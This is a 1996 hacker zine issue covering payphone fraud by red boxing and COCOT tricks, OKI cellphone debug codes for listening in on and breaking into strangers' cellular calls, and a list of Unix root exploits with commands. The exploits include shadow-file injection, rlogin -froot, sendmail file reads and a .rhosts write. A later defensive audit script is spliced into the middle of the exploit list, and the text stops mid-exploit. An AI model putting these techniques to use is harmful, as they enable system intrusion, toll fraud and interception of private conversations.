Masters of Technology
Present
The MOT Newsletter!
Issue 2, February 1, 1996
------------------------------------------------------------------------------
Editor: The Godfather
------------------------------------------------------------------------------
DISCLAIMER!!!
This file is written for informational purposes only. I, The Godfather,
or the writers, do not take any responsibility for any actions taken by
readers of this magazine, unless specifically said in the respective
article.
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
Contents:
Introduction
800 BBS Risks, Telsa, Phile 1 of 7
Making Free Calls From a Payphone, [email protected], Phile 2 of 7
OKI Debug Info, The Godfather, Phile 3 of 7
Root in 5 minutes, The Godfather, Phile 4 of 7
Full (No) Armor, The Godfather, Phile 5 of 7
950-xxxx Scan, The Godfather, Phile 6 of 7
800 Services Part One of Two, The Godfather, Phile 7 of 7
BBS Update
Distribution Info
Editorial
Letters
MOT News
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
Introduction
By: The Godfather
Welcome to the Masters of Technology newsletter. We aren't another lame
group, just a publisher of information such as Phrack. Anyone can write for
MOT, just send me the article at "[email protected]", or at the L0pht BBS.
Some of these philes were not sent to me, but I grabbed them and since
they hadn't been published anywhere else, decided to throw them in.
Greetz to: Cyber Link, Mind Rape (I'll call, I'll call, give me time),
Redboxchillipepper (You cool guy you), Mercenary, Mr. X (where the hell are
you?), Crawl, Dark Tangent
Affilz: You think this is a warez newsletter? Jeez... BTW, I want to
be in the PLA so I can be a cool d00d, and distribute k-radical
PLA business cards all over town, and slaughter innocent gerbils.
Other mags to read: Because I didn't start this magazine to DRAW readers from
any other magazines, I'll put in other mags I think are well worth your time.
For humor and phreaking, read the Phone Losers of America. Their current
issue is #38 I believe. For ALL sorts of subjects, read Phrack. Currently the
issue is #47. These are the more currently updated mags that are electronic
and are free.
Articles for MOT issue 3: If I have time, I'll put together one on the
Stromberg-Carlson DCO 17 switch. That is the switch we have in my area. I am
going to have to call this MOTT (Masters of _Telephone_ Technology) if I
don't get more (or any) hacking articles. Send those along. Send me boards to
put up in our BBS Update, I had to keep along the same ones. Look for a good
article in MOT #3, but I'm not telling you the subject :)
Grr. Send me articles. Jeez, how come Phrack gets all the fucking articles.
Doesn't anyone write stuff anymore? I get tired of seeing my name on every
article in the mag. I guess Phrack isn't doing real well either. Oh well.
I'll continue putting out this magazine articles or not, but if you get
tired of my articles, fucking send me some.
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
800 BBS Risks
By: Telsa
Phile 1 of 7
A word to the wise :
Originally I wrote a textfile called 800-BBS.TXT which explained how to
set up an 800 number to your BBS. A warning, THIS IS NOT SAFE any longer.
AT&T has caught on, and in addition to verifying that you actually ordered
the service, now they call you in a week to verify again, if they get a
Modem or Fax machine they find out who owns the local number [the BBS] and
call them up, and even if you deny it, they can still make you pay the
fee. It is very expensive and AT&T ain't fucking around any longer. They
are busting boards now left and right, so if you wanna take the risq and do
it, be my guest, just keep in mind, there is now an 80% chance of getting busted.
Also AT&T logs every call coming into a BBS [800 number] and even tho they
have never done it to me, they might call to ask if you know the person at
the 800. There are a lot of ppl who have read my textfile and have been
enlightened into how to do it, but you really didn't expect that AT&T was
going to let this go on forever, did you?
I really don't care if you read this and care or not, I'm just warning
you becuz a few friends of mine who have used this method have had to pay
outstanding bills of 10,000 dollars, no joke.. So I warned you, do whatever
Tesla
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
Making Free Calls from a Payphone
By: [email protected]
Phile 2 of 7
From news.uiowa.edu!red.weeg.uiowa.edu!jhentzel Mon Sep 18 00:22:35 1995
Path: news.uiowa.edu!red.weeg.uiowa.edu!jhentzel
From: [email protected] (J. Hentzel)
Newsgroups: alt.2600
Subject: Re: Pay Fones
Date: 18 Sep 1995 05:14:02 GMT
Organization: University of Iowa, Iowa City, IA, USA
Lines: 82
Distribution: world
Message-ID: <[email protected]>
References: <[email protected]>
NNTP-Posting-Host: red.weeg.uiowa.edu
X-Newsreader: TIN [version 1.2 PL2]
Joey ([email protected]) wrote:
: Hi,
: Could someone tell me how to get a free phone call on a pay fone??
If the telephone is owned by the telephone company, then centralized
equipment is used to determine how much money has been inserted into
the telephone. This is done via a series of beeps sent by the pay telephone
down the phone line depending on the amount of money inserted. The phone
transmits one beep for a nickel, two for a dime, five for a quarter and so
on. The centralized equipment detects these tones and remembers how much
money has been inserted, and allows your call to proceed after the proper
amount. Due to the nature of data sent on the telephone line, the pay
telephone is not the only device able to make the proper tones. You can
simulate the "sound" of coins being put into the payphone with a device
called a 'red box'.
The net abounds with plans for red boxes, and you should look into
some of the nicer ones, as they produce clear tones which match the
payphones almost exactly. However, a perhaps easier option is to use a
microcassette recorder and an answering machine together as follows: Go to a
payphone, call your answering machine, then put several quarters into the
phone while the machine is recording your message. This will record the
sounds that quarters make when they are inserted into a pay telephone onto
your answering machine. Then use a microcassette recorder to play the tape
from the answering machine into the microphone of a payphone receiver
after dialing a long distance number.
In recent years, the phone companies have attempted to curtail red
boxing by making the microphone inactive on its new pay phones while it waits
for money to be inserted. This makes it impossible to simply play the tones
into the microphone and have them automatically sent out on the phone
line, and it becomes more difficult to trick the equipment. This can
be circumvented by attaching a regular telephone to the coin line and using
it to make the call. Because the telephone companies control all billing
centrally, a normal phone will behave exactly like a payphone when
hooked to a coin line.
If the pay phone is privately owned, it is called a COCOT (Customer
Owned Coin Operated Telephone), or less commonly COPT (Customer Owned Pay
Telephone). These payphones are not affiliated with the telephone company,
so they cannot use the centralized money detection system and must do the
work internally. Some COCOTs are very easy to defraud. The common method is
as follows:
The FCC requires that 800 numbers be dialable for free from any
payphone (this includes COCOTs) on the belief that this will allow all long
distance companies to be accessible from any phone. You can use this
regulation against some COCOTs by dialing an 800 number and waiting until the
person/machine hangs up. Most switches will return the dialtone at this
time and you are free to make any calls anywhere (for free) because the
phone still thinks you are on the 800 number. Actually, you can dial any
number, with numbers that do not require a coin deposit being the obvious
preference (0, etc) and wait until you are hung up on. The 'standard' number
is 800 LOAN YES, which sometimes does not work, but there are many numbers
with brief messages that disconnect you, we'll always have operators!
You will find that almost all COCOTs respond differently to 800
numbers that hang up on you. The vulnerable ones I have found allow me to
hear about one second of dialtone before muting it out. If you begin
dialing your number while the dialtone is audible it will work perfectly
and connect you for free. You may need a Radio Shack tone dialer to make
the DTMF tones to dial the phone if its keypad is turned off or does not
make the real tones. These are relatively common practices and are easily
bypassed with a simple tone dialer. You will probably find that most
COCOTs will let you hear only dead air after the number hangs up on you,
and after 30 seconds the recording "If you'd like to make a call..."
comes on.
People posting the 800 method are often ridiculed because this
hack is so old that it supposedly never works anymore. I personally have
found three COCOTs vulnerable to this problem, it mostly depends on where you
find your COCOTs. Super Markets are a good place. Many of them have two
or more COCOTs there and most are vulnerable to the hang up trick.
Because the COCOT is not owned by the telephone company, it has a
normal telephone line and does all billing internally. Payphones owned by
the telephone company are just normal phones that make special tones
when money is put into them. A regular (non-pay) telephone connected to a coin
line will still ask for "Three Dollars and Ten Cents" to be inserted for a
long distance call. Obviously, this is not true for the COCOT. If you bypass
the phone, by connecting your own phone to its telephone line you can dial
long distance just as you would on any phone.
Many COCOTs are very intelligent these days, and they are
rarely the easy target they once were. Your best bet is probably to red
box off a telco phone. It's easier, and it's less likely ever to be detected.
Joe
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
OKI Debug Mode Info
By: The Godfather
Phile 3 of 7
Note: Some of this information came from The L0pht, but I expanded on it
quite a bit.
To enter debug mode:
Power the phone up. Wait for PowerOn msg. Hit 7 and 9 together.
Then hit Menu, Snd, End, Rcl, Sto, Clr. Phone says "good timing!!!"
Debugger is now enabled, but phone works normally. Hit 1 and 3
together to halt phone and enter debugger. Everything on display
lights up. Hit Clr until you get status display.
Now you can execute commands listed below. For example to reboot phone
enter #, 0, 2, Snd. Commands all start with # and end with Snd. Some
take arguments.
You can use #25 to display memory in EEPROM; hit # and * to go up and down
in memory, Clr to exit. Hex chars are entered as "*n", like *1=A, *2=B, etc.
SUSPEND #01 Performs Initialization
RESTART #02 Terminates the test mode
STATUS #03 Shows current status of TRU
RESET #04 Resets the autonomous timer
TURNAROUND #05 ? Returns Data Bytes following command to the Test Set.
INIT #06 Initialize the TRU to following states:
Carrier Off, Attenuation - 0db, Receive Audio Muted
Transmit Audio Muted, Signalling tone off,
Autonomous timer reset, SAT off, and DTMF off
CARRIER ON #07 Turns the carrier on
CARRIER OFF #08 Turns the carrier off
LOAD SYNTH #09XXXX Sets the synthesizer to channel XXXX
SET ATTN #10X Set the RF power attenuation to X
0=0db, 7=-28 db (in steps of -4db thru 7)
RXMUTE #11 Mutes the receive audio
RXUNMUTE #12 Unmutes the receive audio
TXMUTE #13 Mutes the transmit audio
TXUNMUTE #14 Unmutes the transmit audio
RESETOFF #15 Discontinues resetting of autonomous timer
STON #16 Transmits a continuous signalling tone
STOFF #17 Stops transmission of signalling tone
SETUP #18 Transmits a 5 word RCC message (fixed text pattern)
VOICE #19 Transmits a 2 word (RCC) RVC message (fixed test pattern)
RCVSU #20 Receives a 2 word FCC message (cancel with 0x38)
RCVVC #21 Receives a 1 word (FCC) FVC message (cancel with 0x38)
SEND-NAM #22 Returns the information contained in the NAM
VERSION #23
SEND-SN #24
MEM #25XXXX Displays the resident memory data at XX
00XX=in micro, XXXX=EEPROM
WSTS #28 Count 1 word messages on CC, until TERMINATE
WSTV #29 Count 1 word messages on VC, until TERMINATE
SATON #32X Enable the transmission of SAT X
0= 5970 Hz, 1=6000 Hz, 2=6030 Hz
SATOFF #33 Disables the transmission of SAT
CDATA #34<60> Transmits 5 word RCC message (30 bytes)
HITNON #35 Activates the 1150Hz tone to receive audio line
HITNOFF #36 Deactivates the 1150Hz tone
LOTNON #37 Activates the 770Hz tone to receive audio line
LOTNOFF #38 Deactivates the 770Hz tone
DTMFON #42XX Enable the transmission of DTMF frequency XX[2]
DTMFOFF #43 Disable the transmission of DTMF
? #44
? #45
? #46
? #47
? #48
? #51
- #52<xx>
? #53
- #54XXXXZZ Write HEX (ZZ) into ADDRESS $XXXX
if 00XXZZ then store #$YY in MicroRAM $XX
- #56 Return Value stored in $BEBB
? #60
? #62
? #63
RCVSU #64 Receives a 2 word FCC message (duplicate of cmd #20)

CMD Compress Tx Mute Rx Mute
--- -------- ------- -------
40 on unmuted unmuted
41 off unmuted unmuted
42 on muted unmuted
43 off muted unmuted
44 on unmuted muted
45 off unmuted muted
46 on muted muted
47 off muted muted
? #72 [pulls something, outputs 1 word!?!]
? #73<arg>
Scans channels,...
#73 XXXX xxxx YY
XXXX = Start channels scan
xxxx = End channels
yy = Time
? #74
- #75 Enable Handsfree (disable spkr)
- #76 Disable Handsfree (enable spkr)
- #77 Turns on Loudspeaker near mic
- #79
? #80
? #81
? #84
? #85
Okay, now to the stuff you can actually DO with this information. I actually
figured out how to listen without help, but Dark Tangent and B-String (or
was it G-String) on the Defcon Voice Bridge told me how to actually break
in the cellular conversation.
Listening to people:
#12
#14 - This sets up the phone, unmutes audio, turns on speaker
#76
#73xxxxxxxx02 - Scans the cellular channels.
When you scan for channels, the 02 tacked on the end says to pause 2 seconds
between channels. Pressing "#" pauses at the current channel, "#" continues
after you have paused, "*" goes to the beginning of the scan.
Breaking into the conversation:
#12
#14
#670 - Sets up the phone. Unmutes, turns on mic, turns on carrier
#77
#100
#07 - To speak into phone. Depending on where you are in relation
to the speakers, this might not work.
#08 - Stop talking to them
Don't abuse this, I don't want any recalls, or new phones without this neat
little debug mode. This has been tested with the OKI 900 and 1325
phones.
Other things:
In my area, there are channels (0350, 0353) that make a warbling sound.
They do it always. I have no explanation for that, but make note of things
like that, they could be open for exploration.
Don't think you will get multitudes of computer passwords or "secret"
information listening to people, usually it is EXTREMELY boring. You can
always laugh at some bitch when she breaks up with her boyfriend, or at
some man talking to his wife about eating her pussy, but I have scanned a
LONG time, and the most I got was a phone number to another cellular phone.
Whoopie, big deal.
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
Getting Root in 5 Minutes
By: The Godfather
Phile 4 of 7
Finally a hacking phile. Sort of. Although this is pretty elementary
information, I haven't seen it elsewhere, so maybe some people will learn
something. Anyway the title is pretty much self explanatory, and if you
have more bugs, send them here.
Type of System: Unix
Versions: All?
Description: Files owned by root with write/execute permissions to all
can be changed into a root shell by copying /bin/sh over
the file.
Example:
% ls -l
-rwxrwx-wx 1 root 31337 Jan 5 19:12 foobar
% cp /bin/sh foobar
% foobar
#
Type of System: AIX
Versions: all?
Description: tprof with the -x parameter executes programs with suid 0
Example:
% tprof -x /bin/sh
#
Type of System: AIX
Versions: 2.2.1
Description: /etc/shadow is writeable
Example:
% echo "rewt::0:0:blahness:/:/bin/sh" >> /etc/shadow
% telnet localhost
Trying...
Connected to haqd.com.
Escape character is '^]'.
login: rewt
#
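An audit script added for this reprint; it is not The Godfather's and not
part of the original phile. It looks for the conditions the entries above
rely on (a root-owned executable that group or others can write, like the
-rwxrwx-wx foobar in the first entry, and a group- or world-writable
/etc/shadow as in the AIX 2.2.1 entry) and for the two things the sendmail
entry at the end of this phile depends on: a .rhosts trust file and a
"decode" alias that pipes mail into uudecode. Everything is relative to a
tree root you pass in, so the script can be exercised on a constructed sample
tree; the function names, the owner argument, and the idea of running it
against "/" on a real host are all my assumptions, not anything the
newsletter describes.

```shell
#!/bin/sh
# Added audit example, not part of the newsletter. Checks the tree under $1 for:
#   1. executables owned by $2 (normally root) that group or others can write
#   2. an etc/shadow that group or others can write
#   3. .rhosts trust files anywhere in the tree
#   4. an etc/aliases "decode" entry that pipes mail into uudecode
# The tree-root argument and the owner argument are assumptions made so the
# checks can run on a constructed sample without root privileges.

# Print files under $1 owned by $2 that carry any execute bit together with a
# group or other write bit. Octal -perm tests work in both GNU and BSD find.
find_writable_execs() {
    find "$1" -type f -user "$2" \
        \( -perm -002 -o -perm -020 \) \
        \( -perm -100 -o -perm -010 -o -perm -001 \) -print 2>/dev/null
}

# Exit 0 when $1 is a regular file writable by group or others.
is_group_or_world_writable() {
    [ -f "$1" ] || return 1
    [ -n "$(find "$1" \( -perm -002 -o -perm -020 \) -print 2>/dev/null)" ]
}

# Print every .rhosts file under $1; each one extends rlogin/rsh trust.
find_rhosts() {
    find "$1" -type f -name .rhosts -print 2>/dev/null
}

# Exit 0 when the aliases file $1 maps "decode" to a pipe into uudecode.
has_decode_alias() {
    [ -f "$1" ] && grep -Eq '^decode:[[:space:]]*"?\|[^"]*uudecode' "$1"
}

# Total number of findings for tree $1 with executables owned by $2.
count_findings() {
    n=$(find_writable_execs "$1" "$2" | wc -l)
    n=$((n + $(find_rhosts "$1" | wc -l)))
    is_group_or_world_writable "$1/etc/shadow" && n=$((n + 1))
    has_decode_alias "$1/etc/aliases" && n=$((n + 1))
    echo "$n"
}

# Remediation for finding 1: take the group/other write bits off a file.
remove_group_other_write() {
    chmod go-w "$1"
}

# Constructed sample tree (not a real system) that trips every check once.
# Files are owned by whoever runs this, so audit it with that user as owner.
make_sample_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/usr/local/bin" "$d/etc" "$d/bin"
    printf '#!/bin/sh\necho foobar\n' > "$d/usr/local/bin/foobar"
    chmod 0773 "$d/usr/local/bin/foobar"     # -rwxrwx-wx, the mode in the entry above
    printf '#!/bin/sh\necho safe\n' > "$d/usr/local/bin/safe"
    chmod 0755 "$d/usr/local/bin/safe"       # -rwxr-xr-x, must not be flagged
    printf 'root:*:0:0:::\n' > "$d/etc/shadow"
    chmod 0666 "$d/etc/shadow"               # writable by everyone
    printf 'otherhost anyuser\n' > "$d/bin/.rhosts"
    printf 'decode: "|/usr/bin/uudecode"\n' > "$d/etc/aliases"
    echo "$d"
}

# Stand-alone run: "sh audit.sh --demo" audits the sample, fixes the
# writable executable, and audits again.
if [ "${1:-}" = "--demo" ]; then
    me=$(id -un)
    tree=$(make_sample_tree)
    echo "findings before: $(count_findings "$tree" "$me")"
    find_writable_execs "$tree" "$me" | while read -r f; do
        remove_group_other_write "$f"
    done
    echo "findings after: $(count_findings "$tree" "$me")"
    rm -rf "$tree"
fi
```

On the sample tree the demo reports four findings, then three once the
group/other write bits are removed from foobar; the writable shadow, the
.rhosts file and the decode alias each need their own fix (tightening the
file mode, deleting the trust file, removing the alias from the aliases file).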
Type of System: AIX
Versions: 3.x.x
Description: rlogind has hole
Example:
% rlogin localhost -l -froot
#
Type of System: BSD, Ultrix
Versions: 4.2 and 3.0 respectively
Description: symbolic links broken, view any file
Example:
% ln -s /etc/shadow /home/haquer/.plan
% finger haquer
Login: haquer Name: hacker
Directory: /home/haquer Shell: /bin/csh
Last Login Fri Apr 13 16:10 (CST) on tty01
No Mail.
<contents of /etc/shadow>
Type of System: Dynix, Ultrix
Versions: 3.0.14 and 2.x respectively
Description: sendmail bug, reads any file
Example:
$ sendmail -C /etc/shadow
<contents of /etc/shadow>
Type of System: Dynix, Irix
Versions: all?
Description: rsh bug executes commands as root
Example:
$ rsh localhost -l "" /bin/sh
#
Type of System: HP/UX
Versions: 7.0-
Description: chfn accepts newlines
Example:
% chfn -f haquer^Mrewt::0:0::/:/bin/sh
% rlogin localhost -l rewt
Warning: .lastlogin not found.
#
Type of System: UNIX
Versions: SunOS, others
Description: sendmail problem
Example:
% telnet host.com 25
220 host.com SunOS Sendmail 8.6.1 #5 ready at Fri, 12 May 95 02:10 (CST)
VRFY decode
250 <|/usr/bin/uudecode>
MAIL FROM: bin
250 <bin> ... Sender Okay
RCPT TO: decode
250 <decode> ... Recipient Okay
DATA
354 Enter mail, end with "." on a line by itself
begin 644 /bin/.rhosts
$*R K"O\
end